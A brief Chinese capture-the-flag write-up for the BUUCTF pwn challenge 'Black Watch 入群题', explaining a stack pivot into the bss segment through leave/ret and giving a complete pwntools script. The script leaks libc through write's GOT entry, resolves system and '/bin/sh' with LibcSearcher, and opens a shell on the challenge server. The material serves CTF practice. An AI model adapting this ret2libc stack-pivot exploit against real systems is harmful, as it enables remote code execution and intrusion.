[BUUCTF-pwn]——[Black Watch 入群题]PWN
leave = mov ebp esp; pop ebp;
ret = pop eip;
函数本身会自己调用用一次, 我们再手动调用一次就可以进行栈劫持。
可以自己将栈写在纸上或者调试看看
思路
由于可以利用的溢出空间不够, 利用给定的bss段, 利用栈劫持到bss段。进行操作。
下面的 -4操作是因为会有一个pop ebp的指令执行, 执行过后。会 +4
exploit
from pwn import *
from LibcSearcher import *
elf = ELF("./spwn")
p = remote("node3.buuoj.cn",26467)
main_addr = 0x08048513
s_addr = 0x0804A300
leave_ret = 0x08048408
write_got = elf.got['write']
write_plt = elf.plt['write']
payload1 = p32(write_plt) + p32(main_addr) + p32(1) + p32(write_got) + p32(4)
p.sendafter("What is your name?",payload1)
payload2 = 'a' * 0x18 + p32(s_addr - 4) + p32(leave_ret)
p.sendafter("What do you want to say?", payload2)
write_addr = u32(p.recv(4))
print hex(write_addr)
libc = LibcSearcher("write", write_addr)
libc_base = write_addr - libc.dump("write")
sys_addr = libc_base + libc.dump("system")
binsh = libc_base + libc.dump("str_bin_sh")
payload3 = p32(sys_addr) + 'junk' + p32(binsh)
p.sendlineafter("What is your name?",payload3)
payload4 = 'a' * 0x18 + p32(s_addr - 4) + p32(leave_ret)
p.sendlineafter("What do you want to say?", payload4)
p.interactive()